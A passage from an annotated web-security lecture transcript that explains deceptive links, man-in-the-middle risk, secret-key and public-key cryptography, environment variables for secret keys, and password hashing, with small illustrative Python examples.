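    """Lowercase host of a URL with any leading 'www.' removed ('' if none)."""
    host = urlparse(url).hostname or ""
    return host[4:] if host.startswith("www.") else host


def suspicious_links(html):
    """Return (text, href) pairs where the text names a different host than the href."""
    parser = LinkCollector()
    parser.feed(html)
    parser.close()
    flagged = []
    for href, text in parser.links:
        if "." not in text or " " in text:
            continue  # text doesn't look like a domain; this heuristic can't judge it
        shown = text if "://" in text else "http://" + text
        if _host(shown) != _host(href):
            flagged.append((text, href))
    return flagged


# The link.html trick: text says google.com, href goes to the course site.
print(suspicious_links('<a href="https://cs50.github.io/web">google.com</a>'))
```

Browsers and mail clients apply far more thorough checks than this, but the core idea is the same: compare where a link says it goes with where it really goes.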

322
00:14:22,643 --> 00:14:26,330
And so these are just some examples
of HTML being used in order

323
00:14:26,330 --> 00:14:29,600
to create potential security exploits.

324
00:14:29,600 --> 00:14:31,776
Questions about any of that so far?

325
00:14:31,776 --> 00:14:32,276
Yeah?

326
00:14:32,276 --> 00:14:37,510
AUDIENCE: So why does our
browser allow us to see a source

327
00:14:37,510 --> 00:14:38,699
code in the first place?

328
00:14:38,699 --> 00:14:39,740
BRIAN YU: Great question.

329
00:14:39,740 --> 00:14:43,050
Why do web browsers allow us to see
the source code in the first place?

330
00:14:43,050 --> 00:14:47,210
Well, in a sense, the web browser,
what it's getting is the source code.

331
00:14:47,210 --> 00:14:50,510
So when a web browser is making
a request to bankofamerica.com,

332
00:14:50,510 --> 00:14:55,760
for instance, bankofamerica.com needs
to give back information to my computer.

333
00:14:55,760 --> 00:14:58,375
And that information needs
to be the code, the HTML,

334
00:14:58,375 --> 00:14:59,750
that is going to render the page.

335
00:14:59,750 --> 00:15:03,740
So hypothetically, a browser might
just not make it easy

336
00:15:03,740 --> 00:15:05,480
to get to that source code.

337
00:15:05,480 --> 00:15:07,610
But anyone who wants to, if
you're really enterprising,

338
00:15:07,610 --> 00:15:10,340
could just look at the information
that's coming back from the server.

339
00:15:10,340 --> 00:15:13,200
That information will contain the
source code one way or another.

340
00:15:13,200 --> 00:15:15,710
So there's really no way to hide it.

341
00:15:15,710 --> 00:15:16,646
Good question, though.

342
00:15:16,646 --> 00:15:19,611


343
00:15:19,611 --> 00:15:20,110
All right.

344
00:15:20,110 --> 00:15:24,550
So that was HTML being used in
order to create potential security

345
00:15:24,550 --> 00:15:26,771
vulnerabilities or security exploits.

346
00:15:26,771 --> 00:15:29,770
Let's take a look now by moving on
one week and talking about Flask.

347
00:15:29,770 --> 00:15:33,430
So we talked about moving on from
just creating static web pages that

348
00:15:33,430 --> 00:15:37,330
are displaying HTML content to using a
web server, where we're communicating

349
00:15:37,330 --> 00:15:40,510
between the server and the user,
sending packets of information

350
00:15:40,510 --> 00:15:41,440
along the internet.

351
00:15:41,440 --> 00:15:44,148
And as soon as we start dealing
with that, packets of information

352
00:15:44,148 --> 00:15:46,850
going from one server to a
client, traveling between routers,

353
00:15:46,850 --> 00:15:49,940
now we start to deal with other
security concerns as well.

354
00:15:49,940 --> 00:15:53,590
So here, we'll start to talk about
HTTP, Hypertext Transfer Protocol, which

355
00:15:53,590 --> 00:15:57,130
is typically used to send packets
of information across the internet,

356
00:15:57,130 --> 00:16:00,610
as well as HTTPS, which is a more
secure version of that, which

357
00:16:00,610 --> 00:16:03,170
we'll take a look at in just a moment.

358
00:16:03,170 --> 00:16:04,855
So let's imagine this diagram.

359
00:16:04,855 --> 00:16:06,730
I have one computer
here, maybe it's a server

360
00:16:06,730 --> 00:16:08,554
running some Flask web application.

361
00:16:08,554 --> 00:16:10,720
And I have a client over
here, which is maybe asking

362
00:16:10,720 --> 00:16:12,520
for information from that web server.

363
00:16:12,520 --> 00:16:14,350
In other words, I've
got two computers that

364
00:16:14,350 --> 00:16:16,934
need to communicate with each
other over the internet somehow.

365
00:16:16,934 --> 00:16:19,433
And maybe they've never
communicated with each other before,

366
00:16:19,433 --> 00:16:21,367
so they need to talk
to each other somehow.

367
00:16:21,367 --> 00:16:23,950
And so this computer might want
to send packets of information

368
00:16:23,950 --> 00:16:24,887
to the other computer.

369
00:16:24,887 --> 00:16:27,970
But of course, that information doesn't
go to the other computer directly.

370
00:16:27,970 --> 00:16:30,010
It needs to travel over
the internet, traveling

371
00:16:30,010 --> 00:16:32,770
between different routers and
different servers for instance,

372
00:16:32,770 --> 00:16:35,012
before it gets from point
A to point B. And likewise,

373
00:16:35,012 --> 00:16:37,720
when information wants to come
back from that computer over there

374
00:16:37,720 --> 00:16:40,240
to this computer, we also
need to have information

375
00:16:40,240 --> 00:16:42,970
that is traveling through the
internet that's potentially going

376
00:16:42,970 --> 00:16:45,190
to all of these routers in between.

377
00:16:45,190 --> 00:16:47,480
And so just looking at
this diagram, what's

378
00:16:47,480 --> 00:16:52,343
a security vulnerability that seems
clear just from a basic perspective?

379
00:16:52,343 --> 00:16:55,794


380
00:16:55,794 --> 00:16:56,780
Yeah?

381
00:16:56,780 --> 00:17:01,294
AUDIENCE: Changing HTTP header could--

382
00:17:01,294 --> 00:17:01,960
BRIAN YU: Great.

383
00:17:01,960 --> 00:17:03,200
So changing HTTP headers.

384
00:17:03,200 --> 00:17:06,760
That's an interesting thought, that if
this request is getting passed from--

385
00:17:06,760 --> 00:17:09,450
a request goes from this computer
through all these routers

386
00:17:09,450 --> 00:17:12,510
into this computer, potentially,
one of the servers in the middle,

387
00:17:12,510 --> 00:17:16,344
one of these routers, might be able
to change that request, for instance,

388
00:17:16,344 --> 00:17:19,260
in order to try and make a request
that's slightly different than what

389
00:17:19,260 --> 00:17:20,670
the original user wanted.

390
00:17:20,670 --> 00:17:23,400
Or likewise, because any of
these intermediary routers

391
00:17:23,400 --> 00:17:27,089
have access to the full contents
of whatever request is being passed

392
00:17:27,089 --> 00:17:30,550
or response is being passed back and
forth between these two computers,

393
00:17:30,550 --> 00:17:34,554
anyone in the middle of this process
could potentially take that information

394
00:17:34,554 --> 00:17:35,470
and have access to it.

395
00:17:35,470 --> 00:17:37,340
They could read an
email that's being sent

396
00:17:37,340 --> 00:17:40,650
or the contents of a web page response
that's being sent from one computer

397
00:17:40,650 --> 00:17:43,090
to the other because that
packet of information

398
00:17:43,090 --> 00:17:45,610
is just traveling over the internet.

399
00:17:45,610 --> 00:17:47,895
So how do we solve that problem?

400
00:17:47,895 --> 00:17:48,805
Yeah?

401
00:17:48,805 --> 00:17:50,170
AUDIENCE: Encrypt traffic.

402
00:17:50,170 --> 00:17:50,950
BRIAN YU: Encrypt traffic.

403
00:17:50,950 --> 00:17:51,450
Great.

404
00:17:51,450 --> 00:17:54,490
Cryptography is this idea of encrypting
information, of making sure--

405
00:17:54,490 --> 00:17:56,740
so that we can encrypt our
information so it's not

406
00:17:56,740 --> 00:17:59,440
the plain text of the
request or the response

407
00:17:59,440 --> 00:18:02,560
that's getting sent over the
internet, but rather some ciphertext,

408
00:18:02,560 --> 00:18:06,489
some encrypted version of that plain
text, such that someone in the middle

409
00:18:06,489 --> 00:18:07,780
can't just immediately read it.

410
00:18:07,780 --> 00:18:10,360
And there are all sorts of
different cryptography algorithms.

411
00:18:10,360 --> 00:18:12,880
And we'll talk high level about
a couple of the ideas that

412
00:18:12,880 --> 00:18:14,650
go behind cryptography.

413
00:18:14,650 --> 00:18:17,590
And so one form of cryptography
you might hear about

414
00:18:17,590 --> 00:18:20,920
is secret key cryptography,
where the idea there

415
00:18:20,920 --> 00:18:24,010
is that we have a secret key
that only I know and only

416
00:18:24,010 --> 00:18:27,220
the person at the other computer that
I want to communicate with knows.

417
00:18:27,220 --> 00:18:30,790
And that key can be used with
my cryptographic algorithm

418
00:18:30,790 --> 00:18:32,500
to encrypt my plain text.

419
00:18:32,500 --> 00:18:37,030
I take my plain text and use my secret
key to encrypt it into ciphertext.

420
00:18:37,030 --> 00:18:39,910
Or likewise, I can use the
key to decrypt information.

421
00:18:39,910 --> 00:18:43,000
If I have ciphertext, something
that's already been encrypted,

422
00:18:43,000 --> 00:18:45,790
I can use that key along
with the ciphertext

423
00:18:45,790 --> 00:18:47,800
in order to generate plain text.

424
00:18:47,800 --> 00:18:50,860
And so you might imagine a diagram
where I have one computer over here

425
00:18:50,860 --> 00:18:53,260
and I'm trying to communicate
with a computer down there.

426
00:18:53,260 --> 00:18:57,750
I have this secret key, this ability
to encrypt and decrypt information,

427
00:18:57,750 --> 00:19:00,250
and I also have the plain text
of what it is that I actually

428
00:19:00,250 --> 00:19:05,470
want to encrypt, the message that I want
to send from one place to the other.

429
00:19:05,470 --> 00:19:07,060
And so what might reasonably happen?

430
00:19:07,060 --> 00:19:10,030
What I do in secret key
cryptography is first

431
00:19:10,030 --> 00:19:13,330
use the key to encrypt
the plain text, generating

432
00:19:13,330 --> 00:19:16,090
some ciphertext, some encrypted
version of the plain text

433
00:19:16,090 --> 00:19:19,300
that someone without the key
wouldn't be able to understand.

434
00:19:19,300 --> 00:19:22,880
So then I would need to transfer
the ciphertext to this computer.

435
00:19:22,880 --> 00:19:26,110
And if this computer has both the
ciphertext and a copy of that same

436
00:19:26,110 --> 00:19:30,490
secret key, then they can use that key
in order to decrypt that ciphertext

437
00:19:30,490 --> 00:19:34,000
and regenerate the plain text-- find
out what it is that I actually intended

438
00:19:34,000 --> 00:19:34,810
to happen--

439
00:19:34,810 --> 00:19:39,220
such that now, the plain text was
never transferred from one computer

440
00:19:39,220 --> 00:19:40,060
to the other.

441
00:19:40,060 --> 00:19:42,850
I was only ever
transferring the ciphertext

442
00:19:42,850 --> 00:19:45,520
from one computer to the other.
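To make the secret key idea concrete, here is a minimal Python sketch. It assumes a toy XOR cipher whose random key is as long as the message (a one-time pad). It is illustrative only: real systems use vetted ciphers such as AES, and a pad key must never be reused. The names `xor_bytes` and `shared_key` are hypothetical.

```python
import secrets

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR each byte of data with the matching byte of key.

    The same function both encrypts and decrypts, because
    (p ^ k) ^ k == p for every byte p and key byte k.
    """
    if len(key) < len(data):
        raise ValueError("key must be at least as long as the data")
    return bytes(d ^ k for d, k in zip(data, key))

# Both computers must already share this key (the hard part).
plaintext = b"meet me at noon"
shared_key = secrets.token_bytes(len(plaintext))

# Computer A encrypts and sends only the ciphertext.
ciphertext = xor_bytes(plaintext, shared_key)

# Computer B, holding the same key, recovers the plain text.
recovered = xor_bytes(ciphertext, shared_key)
print(recovered)  # b'meet me at noon'
```

Notice that the sketch quietly assumes both sides already hold `shared_key`. Getting it there safely is exactly the problem raised next.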

443
00:19:45,520 --> 00:19:48,381
Does anyone see a problem
with what we just did there?

444
00:19:48,381 --> 00:19:50,380
It seems like no plain
text is ever transferred.

445
00:19:50,380 --> 00:19:50,910
What could go wrong?

446
00:19:50,910 --> 00:19:51,342
Yeah?

447
00:19:51,342 --> 00:19:52,640
AUDIENCE: How do you send the key?

448
00:19:52,640 --> 00:19:52,930
BRIAN YU: Great.

449
00:19:52,930 --> 00:19:54,070
How do you send the key?

450
00:19:54,070 --> 00:19:58,270
That somehow, I need to have
this key and the person over here

451
00:19:58,270 --> 00:20:00,160
also needs to have that key.

452
00:20:00,160 --> 00:20:03,252
And if I'm just sending the key
over the internet from one computer

453
00:20:03,252 --> 00:20:04,960
to the other, which
I would theoretically

454
00:20:04,960 --> 00:20:06,880
need to do because otherwise
I have no way of communicating

455
00:20:06,880 --> 00:20:10,160
with the other computer, then we've
just created the same problem again.

456
00:20:10,160 --> 00:20:13,240
That any of these routers,
these intermediary pieces,

457
00:20:13,240 --> 00:20:16,780
over the course of this communication
from computer A to computer B,

458
00:20:16,780 --> 00:20:20,176
could just intercept the key
and intercept the ciphertext.

459
00:20:20,176 --> 00:20:22,300
And now they have all the
pieces they need in order

460
00:20:22,300 --> 00:20:24,620
to regenerate the plain text.

461
00:20:24,620 --> 00:20:28,300
So this secret key
cryptography works if and only

462
00:20:28,300 --> 00:20:31,630
if only I and only the other
person have access to the key.

463
00:20:31,630 --> 00:20:35,440
And it doesn't work so well
if this key is something

464
00:20:35,440 --> 00:20:39,160
that needs to be transferred
plainly over the network in order

465
00:20:39,160 --> 00:20:42,740
to get to the other person, because then
anyone could just intercept that key.

466
00:20:42,740 --> 00:20:44,269
And so how do we solve that problem?

467
00:20:44,269 --> 00:20:46,060
Well, one solution
people have come up with

468
00:20:46,060 --> 00:20:48,410
is this idea of public key cryptography.

469
00:20:48,410 --> 00:20:50,830
And this is very common,
and it's what HTTPS

470
00:20:50,830 --> 00:20:54,850
uses in order to securely transfer
information over the internet.

471
00:20:54,850 --> 00:20:59,170
And the idea there is instead of
having just one key, we have two keys.

472
00:20:59,170 --> 00:21:01,690
We have a public key and a private key.

473
00:21:01,690 --> 00:21:03,940
And these are related in a
particularly important way,

474
00:21:03,940 --> 00:21:06,740
and the details have to do
with a lot of mathematics.

475
00:21:06,740 --> 00:21:10,750
But the general idea is that
the public key is something

476
00:21:10,750 --> 00:21:12,920
that you should be able
to share with anyone,

477
00:21:12,920 --> 00:21:16,500
and the public key can only be
used to encrypt information.

478
00:21:16,500 --> 00:21:18,940
It will take plain
text and it'll generate

479
00:21:18,940 --> 00:21:20,752
the ciphertext, the encrypted version.

480
00:21:20,752 --> 00:21:22,460
But it doesn't go in
the other direction.

481
00:21:22,460 --> 00:21:24,880
It can only be used to encrypt data.

482
00:21:24,880 --> 00:21:27,409
And likewise, the
private key is something

483
00:21:27,409 --> 00:21:29,200
that you should only
ever keep to yourself.

484
00:21:29,200 --> 00:21:31,660
You should never share your
private key with anyone else.

485
00:21:31,660 --> 00:21:34,360
And the private key can
be used to decrypt data.

486
00:21:34,360 --> 00:21:36,550
That if I have encrypted
information that

487
00:21:36,550 --> 00:21:40,090
was encrypted using the public
key, I can use the private key

488
00:21:40,090 --> 00:21:42,271
in order to decrypt it.

489
00:21:42,271 --> 00:21:44,020
So what does that model
look like if I now

490
00:21:44,020 --> 00:21:46,720
have two computers that want
to communicate with each other?

491
00:21:46,720 --> 00:21:48,670
I still have this
computer over here that

492
00:21:48,670 --> 00:21:51,680
wants to send this plain
text over to this computer,

493
00:21:51,680 --> 00:21:53,560
but wants to do so securely.

494
00:21:53,560 --> 00:21:55,630
So the first thing that's
going to need to happen

495
00:21:55,630 --> 00:21:58,330
is that this computer,
computer B down here,

496
00:21:58,330 --> 00:22:01,654
gives its public key to
computer A. And that's

497
00:22:01,654 --> 00:22:04,570
OK because the public key is something
that can be shared with anyone.

498
00:22:04,570 --> 00:22:07,150
Anyone's allowed to see it
because the public key can only

499
00:22:07,150 --> 00:22:08,590
be used to encrypt data.

500
00:22:08,590 --> 00:22:11,060
It can't be used to decrypt data.

501
00:22:11,060 --> 00:22:14,920
And so now computer A, having access
to the plain text and the public key,

502
00:22:14,920 --> 00:22:19,010
now has the ability to encrypt the
plain text, generating the ciphertext.

503
00:22:19,010 --> 00:22:22,420
That ciphertext then gets transferred
down to the other computer.

504
00:22:22,420 --> 00:22:26,140
And now computer B has both the
ciphertext, this encrypted information

505
00:22:26,140 --> 00:22:29,350
that nobody along this path
was able to read or see,

506
00:22:29,350 --> 00:22:33,130
and also has access to this private
key that only they had access to.

507
00:22:33,130 --> 00:22:37,210
And that is the only thing that can be
used in order to take the ciphertext

508
00:22:37,210 --> 00:22:40,700
and decrypt it and figure out what
it is that the message actually is.

509
00:22:40,700 --> 00:22:44,940
And now computer B has the ability
to regenerate the plain text from it.

510
00:22:44,940 --> 00:22:48,575
And so now we've been able to come up
with a secure way of allowing computer

511
00:22:48,575 --> 00:22:51,380
A and computer B to
communicate with each other,

512
00:22:51,380 --> 00:22:55,341
just by allowing them to use this
public and private key pairing such

513
00:22:55,341 --> 00:22:57,590
that the public key is used
to encrypt the information

514
00:22:57,590 --> 00:22:59,990
and is shared with everyone,
and the private key is only

515
00:22:59,990 --> 00:23:01,820
used for decrypting the information.

516
00:23:01,820 --> 00:23:03,470
And it doesn't matter if
the intermediaries have

517
00:23:03,470 --> 00:23:05,844
the public key because that
just means other people might

518
00:23:05,844 --> 00:23:09,470
be able to encrypt the
data, but they won't be

519
00:23:09,470 --> 00:23:11,992
able to decrypt that information.
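Here is a toy sketch of the public/private key flow. It assumes textbook RSA with the tiny, well-known example primes 61 and 53. Numbers this small are trivially breakable, and textbook RSA without padding is insecure, so this only illustrates the math. In practice, HTTPS uses public key cryptography mainly to authenticate the server and agree on a shared secret key, then switches to faster secret key encryption for the rest of the connection. The sketch requires Python 3.9+ (for `pow(e, -1, phi)` and the `tuple[int, int]` annotation).

```python
# Textbook RSA with tiny example numbers. Insecure: illustration only.
p, q = 61, 53
n = p * q                  # 3233, part of both keys
phi = (p - 1) * (q - 1)    # 3120
e = 17                     # public exponent, coprime with phi
d = pow(e, -1, phi)        # private exponent: modular inverse of e mod phi

public_key = (n, e)        # computer B may share this with anyone
private_key = (n, d)       # computer B keeps this to itself

def encrypt(m: int, key: tuple[int, int]) -> int:
    """Encrypt an integer message m (0 <= m < n) with a public key."""
    modulus, exponent = key
    return pow(m, exponent, modulus)

def decrypt(c: int, key: tuple[int, int]) -> int:
    """Decrypt an integer ciphertext c with the matching private key."""
    modulus, exponent = key
    return pow(c, exponent, modulus)

message = 65                                   # must be smaller than n
ciphertext = encrypt(message, public_key)      # computer A uses B's public key
print(ciphertext)                              # 2790
print(decrypt(ciphertext, private_key))        # 65
```

Anyone in the middle can see `public_key` and `ciphertext`, but without `d` they cannot easily undo the encryption. Recovering `d` requires factoring `n`, which is only easy here because `n` is tiny.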

520
00:23:11,992 --> 00:23:14,700
Questions about that or any problems
that we see with that model?

521
00:23:14,700 --> 00:23:19,140


522
00:23:19,140 --> 00:23:20,040
OK.

523
00:23:20,040 --> 00:23:23,520
In that case, we'll go
ahead and move on to talking

524
00:23:23,520 --> 00:23:27,501
about our next subject, which is
going to be environment variables.

525
00:23:27,501 --> 00:23:29,250
And so environment
variables are something

526
00:23:29,250 --> 00:23:32,771
we've seen a little bit of in Flask
before, and probably in Django as well.

527
00:23:32,771 --> 00:23:34,770
But we'll talk about it
in the context of trying

528
00:23:34,770 --> 00:23:36,730
to make our applications more secure.

529
00:23:36,730 --> 00:23:38,730
So we talked about,
in the context of Git

530
00:23:38,730 --> 00:23:41,700
earlier, that we rarely,
or probably never,

531
00:23:41,700 --> 00:23:45,027
want to put passwords or other
secure, confidential information

532
00:23:45,027 --> 00:23:46,110
inside of our source code.

533
00:23:46,110 --> 00:23:50,530
Because as soon as we push a password or
an access token to a GitHub repository,

534
00:23:50,530 --> 00:23:52,957
now suddenly anyone who has
had access to that repository

535
00:23:52,957 --> 00:23:54,540
could theoretically see it.

536
00:23:54,540 --> 00:23:57,660
Or if someone gets access to your
GitHub account by some means or another,

537
00:23:57,660 --> 00:24:00,660
they would also be able to see
that password or access token.

538
00:24:00,660 --> 00:24:03,930
Maybe that's going to be the access token
that you use for getting

539
00:24:03,930 --> 00:24:05,880
access to your database, for instance.

540
00:24:05,880 --> 00:24:08,170
Or it's your access
token for whatever cloud

541
00:24:08,170 --> 00:24:10,170
provider you're using,
like Amazon Web Services,

542
00:24:10,170 --> 00:24:13,050
in order to deploy your
application to the internet.

543
00:24:13,050 --> 00:24:16,830
So rather than doing something
like this, where if you've used

544
00:24:16,830 --> 00:24:19,350
Flask before and have used
its cookie-based sessions,

545
00:24:19,350 --> 00:24:21,825
you need to set a secret key
inside of your application

546
00:24:21,825 --> 00:24:23,700
where you might have
set a secret key to just

547
00:24:23,700 --> 00:24:28,020
be some random string of characters,
which is totally fine for just running

548
00:24:28,020 --> 00:24:29,040
the application.

549
00:24:29,040 --> 00:24:31,230
This isn't all that
secure because as soon

550
00:24:31,230 --> 00:24:34,140
as you push this file to
the internet, now anyone

551
00:24:34,140 --> 00:24:36,360
who has access to your
repository theoretically

552
00:24:36,360 --> 00:24:38,339
has access to your secret key as well.

553
00:24:38,339 --> 00:24:41,130
And so these are situations where
we would want to use environment

554
00:24:41,130 --> 00:24:44,920
variables, using variables that are
located just inside of the system

555
00:24:44,920 --> 00:24:48,270
on the computer where your program
is running such that we can replace

556
00:24:48,270 --> 00:24:52,690
the key with
os.environ.get("SECRET_KEY").

557
00:24:52,690 --> 00:24:55,650
In other words, get the environment
variable called SECRET_KEY

558
00:24:55,650 --> 00:24:58,830
and use it as a secret key
so that inside your code, now

559
00:24:58,830 --> 00:24:59,910
it just says this.

560
00:24:59,910 --> 00:25:03,750
So nobody who reads your code knows what
the secret key for your application is.

561
00:25:03,750 --> 00:25:08,070
Only the computer on which this
program is running, which presumably

562
00:25:08,070 --> 00:25:11,200
has that secret key set as one
of its environment variables,

563
00:25:11,200 --> 00:25:12,540
will then be able to use it.

564
00:25:12,540 --> 00:25:14,560
And so environment
variables in that sense

565
00:25:14,560 --> 00:25:17,460
can be a very valuable
tool when it comes

566
00:25:17,460 --> 00:25:20,460
to trying to make sure that
we're not exposing information

567
00:25:20,460 --> 00:25:25,320
that we didn't want to expose when
we were creating our application.
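Here is a minimal sketch of reading the key from the environment. It includes a check so that a missing variable fails loudly instead of silently leaving the app without a key. The helper name `load_secret_key` is hypothetical. In a Flask app you would assign its result to `app.secret_key` (or `app.config["SECRET_KEY"]`).

```python
import os

def load_secret_key() -> str:
    """Return the SECRET_KEY environment variable, or raise if it is missing."""
    key = os.environ.get("SECRET_KEY")
    if not key:
        # Refuse to start with an empty or missing key rather than
        # falling back to a hard-coded value in the source code.
        raise RuntimeError("SECRET_KEY environment variable is not set")
    return key
```

The variable itself is set outside the code, for example with `export SECRET_KEY=...` in the shell or in the hosting provider's configuration, so the value never lands in the Git repository.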

568
00:25:25,320 --> 00:25:29,580
Questions about environment variables?

569
00:25:29,580 --> 00:25:30,330
All right.

570
00:25:30,330 --> 00:25:31,530
So that was Flask.

571
00:25:31,530 --> 00:25:34,710
And let's go ahead now and
move on to talking about SQL.

572
00:25:34,710 --> 00:25:37,020
So we talked a lot
about databases and how

573
00:25:37,020 --> 00:25:39,150
we might go about designing databases.

574
00:25:39,150 --> 00:25:41,220
And in a couple of our
projects now, we've

575
00:25:41,220 --> 00:25:45,000
had to create a table that is able
to manage a database of users, where

576
00:25:45,000 --> 00:25:47,040
users are able to log in and log out.

577
00:25:47,040 --> 00:25:50,730
And in order to do that, we needed some
sort of database structure in place

578
00:25:50,730 --> 00:25:54,369
such that users could be
remembered by our system, so

579
00:25:54,369 --> 00:25:56,910
that they could log in
and have passwords and such.

580
00:25:56,910 --> 00:25:59,743
And you might imagine that a users
table might have looked something

581
00:25:59,743 --> 00:26:03,510
like this, where each user has
an ID, each user has a username,

582
00:26:03,510 --> 00:26:06,010
each user has a password.

583
00:26:06,010 --> 00:26:09,855
What are potential design problems
or security vulnerabilities

584
00:26:09,855 --> 00:26:11,480
with a table that's designed like this?

585
00:26:11,480 --> 00:26:14,290


586
00:26:14,290 --> 00:26:15,512
Yep?

587
00:26:15,512 --> 00:26:18,278
AUDIENCE: If someone gets
their hands on the database,

588
00:26:18,278 --> 00:26:19,670
they can see all the passwords.

589
00:26:19,670 --> 00:26:19,970
BRIAN YU: Yeah.

590
00:26:19,970 --> 00:26:22,160
So obviously, we want to
keep our tables secure.

591
00:26:22,160 --> 00:26:24,701
We don't want to let just anyone
have access to our database.

592
00:26:24,701 --> 00:26:27,230
But if by some chance, someone
got access to our database,

593
00:26:27,230 --> 00:26:30,380
either because they managed to
figure out what the password is

594
00:26:30,380 --> 00:26:32,720
or they got access to it
in some other way, now

595
00:26:32,720 --> 00:26:37,370
suddenly they have access to all
of the different passwords that

596
00:26:37,370 --> 00:26:38,904
are inside of this database.

597
00:26:38,904 --> 00:26:40,820
They know what everyone's
password is, and now

598
00:26:40,820 --> 00:26:42,620
that's a major security vulnerability.

599
00:26:42,620 --> 00:26:45,710
Especially if some of these users
might be using these same passwords

600
00:26:45,710 --> 00:26:48,980
not only on one website, but on
many other different websites.

601
00:26:48,980 --> 00:26:52,850
Now their password could be compromised
across a number of different websites

602
00:26:52,850 --> 00:26:53,790
as well.

603
00:26:53,790 --> 00:26:58,017
And so what might be a solution here to
avoiding needing to store the password

604
00:26:58,017 --> 00:26:58,850
inside of the table?

605
00:26:58,850 --> 00:27:00,470
And this might be something
that you've already

606
00:27:00,470 --> 00:27:02,094
done in some of your existing projects.

607
00:27:02,094 --> 00:27:04,940


608
00:27:04,940 --> 00:27:06,405
AUDIENCE: Encrypt the passwords.

609
00:27:06,405 --> 00:27:07,030
BRIAN YU: Yeah.

610
00:27:07,030 --> 00:27:08,230
Encrypt the password.

611
00:27:08,230 --> 00:27:11,350
In other words, don't just store
the plain text of the password,

612
00:27:11,350 --> 00:27:13,310
store some version of the password.

613
00:27:13,310 --> 00:27:15,310
And in particular, instead of encrypting it,
we'll generally store what we

614
00:27:15,310 --> 00:27:17,530
call a hashed version of the password.

615
00:27:17,530 --> 00:27:21,490
Where a hash function is just going to
be some function inside of your code

616
00:27:21,490 --> 00:27:25,240
that takes text like a
password and generates,

617
00:27:25,240 --> 00:27:29,350
deterministically, some long sequence of
characters that's seemingly random that

618
00:27:29,350 --> 00:27:31,750
is associated with that text.

619
00:27:31,750 --> 00:27:35,620
And so every time you put hello
in as the password and hash it,

620
00:27:35,620 --> 00:27:38,050
you'll always deterministically
get the same output.

621
00:27:38,050 --> 00:27:40,550
And so then your users table
might look something like this.

622
00:27:40,550 --> 00:27:43,420
Where you've got all of your
users, but in your password column,

623
00:27:43,420 --> 00:27:46,150
instead of storing the actual
password in plain text,

624
00:27:46,150 --> 00:27:49,090
you're storing some hashed
version of that password.

625
00:27:49,090 --> 00:27:52,810
Such that hello generates
this text as the password

626
00:27:52,810 --> 00:27:54,910
instead of just storing hello.

627
00:27:54,910 --> 00:27:58,900
So now if someone gets
access to this database,

628
00:27:58,900 --> 00:28:01,650
they're still not going to be able
to log into Anushree's account,

629
00:28:01,650 --> 00:28:04,108
for instance, if they go to
the website because they're not

630
00:28:04,108 --> 00:28:08,950
going to know what password corresponded
with this long sequence of characters.

631
00:28:08,950 --> 00:28:13,000
And generally, hash functions are
designed to be one-way functions.

632
00:28:13,000 --> 00:28:16,870
That you can go from the plain text,
the password, to this hashed version.

633
00:28:16,870 --> 00:28:19,540
But it's very, very computationally
difficult to go backwards,

634
00:28:19,540 --> 00:28:22,450
to go from this hashed version
to what the password originally

635
00:28:22,450 --> 00:28:24,880
was in order to generate this.
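Here is a small illustration of the two properties just described: deterministic output and a one-way function. It uses SHA-256 from Python's standard `hashlib`. This only shows the idea. A fast general-purpose hash like SHA-256 on its own is not a good choice for storing real passwords, because it makes guessing cheap. The function name `hash_password` is hypothetical.

```python
import hashlib

def hash_password(password: str) -> str:
    """Return the SHA-256 digest of a password as a 64-character hex string."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()

print(hash_password("hello"))
# Same input, same output, every time:
print(hash_password("hello") == hash_password("hello"))  # True
# A tiny change in the input gives a completely different digest:
print(hash_password("hello") == hash_password("Hello"))  # False
```

There is no corresponding "unhash" function. The only way back from a digest to a password is to guess inputs and hash them.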

636
00:28:24,880 --> 00:28:29,300
And so what are the security
implications of this model?

637
00:28:29,300 --> 00:28:30,880
How do we log in a user now,

638
00:28:30,880 --> 00:28:31,509
in this model?

639
00:28:31,509 --> 00:28:33,550
If someone were to log
into a website, what logic

640
00:28:33,550 --> 00:28:35,508
would need to happen if
we're no longer storing

641
00:28:35,508 --> 00:28:37,732
passwords but storing hashed passwords?

642
00:28:37,732 --> 00:28:38,232
Yeah?

643
00:28:38,232 --> 00:28:38,728
AUDIENCE: They could
take the password they

644
00:28:38,728 --> 00:28:40,519
enter, you run through
your hash algorithm,

645
00:28:40,519 --> 00:28:42,436
and you see if it matches
what's in your file.

646
00:28:42,436 --> 00:28:43,269
BRIAN YU: Wonderful.

647
00:28:43,269 --> 00:28:45,220
User logs in with their
username and password.

648
00:28:45,220 --> 00:28:47,710
You take that password and
you hash it, and you check

649
00:28:47,710 --> 00:28:49,520
to make sure that the hash matches up.

650
00:28:49,520 --> 00:28:51,478
And because our hash
function is deterministic,

651
00:28:51,478 --> 00:28:54,790
the same input will produce the
same output every single time.

652
00:28:54,790 --> 00:28:57,250
If they did input the correct
password, then the hashes

653
00:28:57,250 --> 00:28:59,920
should theoretically line up.
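Here is a minimal sketch of that login check. It assumes Python's standard `hashlib.pbkdf2_hmac` as a deliberately slow hash. It also adds a random per-user salt stored next to the hash, so that two users with the same password get different stored values. The iteration count is an illustrative assumption; OWASP's password storage guidance currently suggests a considerably higher count for PBKDF2-HMAC-SHA256. The function names are hypothetical.

```python
import hashlib
import hmac
import secrets

ITERATIONS = 100_000  # illustrative only; tune upward for production

def make_password_record(password: str) -> tuple[bytes, bytes]:
    """Hash a new password; store both the salt and the digest in the users table."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest

def check_password(password: str, salt: bytes, stored_digest: bytes) -> bool:
    """Re-hash the submitted password with the stored salt and compare."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    # compare_digest avoids leaking, via timing, how many leading bytes matched.
    return hmac.compare_digest(candidate, stored_digest)

salt, digest = make_password_record("hello")
print(check_password("hello", salt, digest))   # True
print(check_password("hello!", salt, digest))  # False
```

With this design, resetting a password just means calling `make_password_record` on the new password and overwriting the stored salt and digest. At no point can the server recover the old password.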

654
00:28:59,920 --> 00:29:02,020
Have you ever used a
website before where,

655
00:29:02,020 --> 00:29:04,562
when you forget
your password,

656
00:29:04,562 --> 00:29:06,520
you might want the
website to just tell you

657
00:29:06,520 --> 00:29:08,965
what your password is, but
the website says, sorry,

658
00:29:08,965 --> 00:29:12,940
we can't tell you what your password is,
but we can let you reset your password.

659
00:29:12,940 --> 00:29:14,900
With this in mind, why
might that be the case?

660
